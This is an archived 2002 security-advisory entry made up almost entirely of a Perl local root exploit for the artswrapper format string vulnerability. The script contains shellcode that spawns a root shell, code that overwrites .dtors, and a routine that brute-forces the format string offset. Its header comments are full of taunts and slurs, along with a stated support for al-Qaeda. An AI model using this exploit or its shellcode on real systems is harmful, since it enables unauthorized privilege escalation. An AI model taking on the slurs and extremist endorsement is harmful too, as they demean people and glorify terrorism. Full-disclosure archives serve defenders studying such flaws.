LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT

2002-07-08T00:00:00
ID SECURITYVULNS:DOC:3179
Type securityvulns
Reporter Securityvulns
Modified 2002-07-08T00:00:00

Description

#!/usr/bin/perl
#
# fartsy.pl by kanix <kanix@0xfee1dead.net>
#
# /usr/sbin/artswrapper <local format string exploit>
#
# Tested on Red Hat Linux release 7.2 (Enigma)
#
# Jul 6, 2002
#
# "the secret to creativity is knowing how to hide your
#  sources."
#                                        - Albert Einstein
#
# commentz, job offerz, flamez, etc. should be directed to my e-mail
# address -- I WILL SCHOOL YOU ALL.
#
# SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
#
# official supporter of the al-Qaeda Terrorist Network.
#
# BURN, BABY, BURN!!!
#
# I 0xc0ded this for fun and profit... and to get scene whorez. ;>
#
# This code is far from special - my mother could have written it,
# however, that is the extent of my ability.
#
# I can code sploits, but I know nothing of UNC file sharing! I'm
# still very 0x1337. I mean, I can code exploits, that's what makes
# you a hacker!
#
# SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
# there are enuff retardz in the hacker scene already (LIKE ME ;>)!
#
# Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
# security.is, #hackphreak, teleh0r (fame seeking whore like
# me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
# AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS,
# BITCH!@#$%!)
#
# kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
# kanix: can some1 pleeze tell me about DNS cache poisoning?

$kode = "\x31\xdb".              # xor ebx, ebx
        "\xf7\xe3".              # mul ebx
        "\xb0\x17".              # mov al, 0x17
        "\xcd\x80".              # int 0x80
        "\x31\xc0".              # xor eax, eax
        "\x99".                  # cdq
        "\x52".                  # push edx
        "\x68\x2f\x2f\x73\x68".  # push dword 0x68732f2f
        "\x68\x2f\x62\x69\x6e".  # push dword 0x6e69622f
        "\x89\xe3".              # mov ebx, esp
        "\x52".                  # push edx
        "\x53".                  # push ebx
        "\x89\xe1".              # mov ecx, esp
        "\xb0\x0b".              # mov al, 0x0b
        "\xcd\x80";              # int 0x80

$vuln  = "/usr/bin/artswrapper";
$dtors = 0x8049a7c + 4;          # I overwrite .dtors! (patent pending)

printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");

$ret_addr = 0xc0000000 - 4 - (length($vuln) + 1) - (length($kode) + 1);

undef(%ENV);
$ENV{'1337'} = $kode;

printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);

for (1 .. 300) {
    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
    die("\x0a") if (system("$vuln -a $fmt_str")) =~ m/^(0|256|512|32512)$/;
}

sub sw_fmtstr_create ($$$) {
    die("Incorrect number of arguments for sw_fmtstr_create") unless @_ == 3;

    my ($dest_addr, $ret_addr, $dist) = @_;
    my ($word, $qword) = (2, 8);

    $tmp1 = (($ret_addr >> 16) & 0xffff);
    $tmp2 = $ret_addr & 0xffff;

    if ($tmp1 < $tmp2) {
        $high = $tmp1 - $qword;
        $low  = $tmp2 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr + $word);
        $dest_addr2 = pack('L', $dest_addr);
    }
    else {
        $high = $tmp2 - $qword;
        $low  = $tmp1 - $high - $qword;

        $dest_addr1 = pack('L', $dest_addr);
        $dest_addr2 = pack('L', $dest_addr + $word);
    }

    sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
            $dest_addr1, $dest_addr2, $high, $dist,
            $low, $dist + 1);
}